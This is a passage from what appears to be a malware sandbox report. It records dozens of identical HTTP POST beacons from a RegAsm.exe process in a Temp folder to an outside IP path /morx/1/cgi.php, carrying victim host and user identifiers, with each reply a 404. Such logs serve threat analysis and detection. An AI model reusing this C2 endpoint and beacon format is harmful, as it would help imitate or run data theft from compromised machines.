                                                                                        Jan 5, 2021 19:06:40.418672085 CET1251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:40.507894039 CET1252INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:39 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        84192.168.2.2249251185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:40.714092016 CET1252OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:40.792989016 CET1253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:40.893522978 CET1253INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:39 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        85192.168.2.2249252185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:41.109833956 CET1254OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:41.183476925 CET1254OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:41.281018019 CET1254INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:40 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        86192.168.2.2249253185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:41.488492012 CET1255OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:41.558628082 CET1255OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:41.665958881 CET1256INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:40 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        87192.168.2.2249254185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:41.875312090 CET1256OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:41.949035883 CET1256OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:42.043814898 CET1257INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:41 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        88192.168.2.2249255185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:42.266644955 CET1258OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:42.339826107 CET1258OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:42.432653904 CET1258INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:41 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        89192.168.2.2249256185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:42.638994932 CET1259OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:42.714842081 CET1259OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:42.805691004 CET1259INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:41 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        9192.168.2.2249176185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.888135910 CET1153OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:10.964956045 CET1154OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:11.065620899 CET1154INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        90192.168.2.2249257185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:43.011253119 CET1260OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:43.074328899 CET1260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:43.168521881 CET1261INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:42 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        91192.168.2.2249258185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:43.372296095 CET1261OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:43.433650970 CET1262OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:43.526493073 CET1262INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:42 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        92192.168.2.2249259185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:43.756834984 CET1263OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:43.824333906 CET1263OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:43.913404942 CET1263INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:43 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        93192.168.2.2249260185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:44.120265961 CET1264OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:44.183681965 CET1264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:44.276026011 CET1265INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:43 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        94192.168.2.2249261185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:44.485788107 CET1265OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:44.558702946 CET1266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:44.652260065 CET1266INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:43 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        95192.168.2.2249262185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:44.876902103 CET1267OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:44.949070930 CET1267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:45.053688049 CET1267INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:44 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        96192.168.2.2249263185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:45.261636972 CET1268OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:45.324451923 CET1268OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:45.422622919 CET1269INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:44 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        97192.168.2.2249264185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:45.633934021 CET1269OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:45.699744940 CET1270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:45.789961100 CET1270INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:44 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        98192.168.2.2249265185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:45.996354103 CET1271OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:46.074238062 CET1271OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:46.162508011 CET1271INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:45 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        99192.168.2.2249266185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:46.366772890 CET1272OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
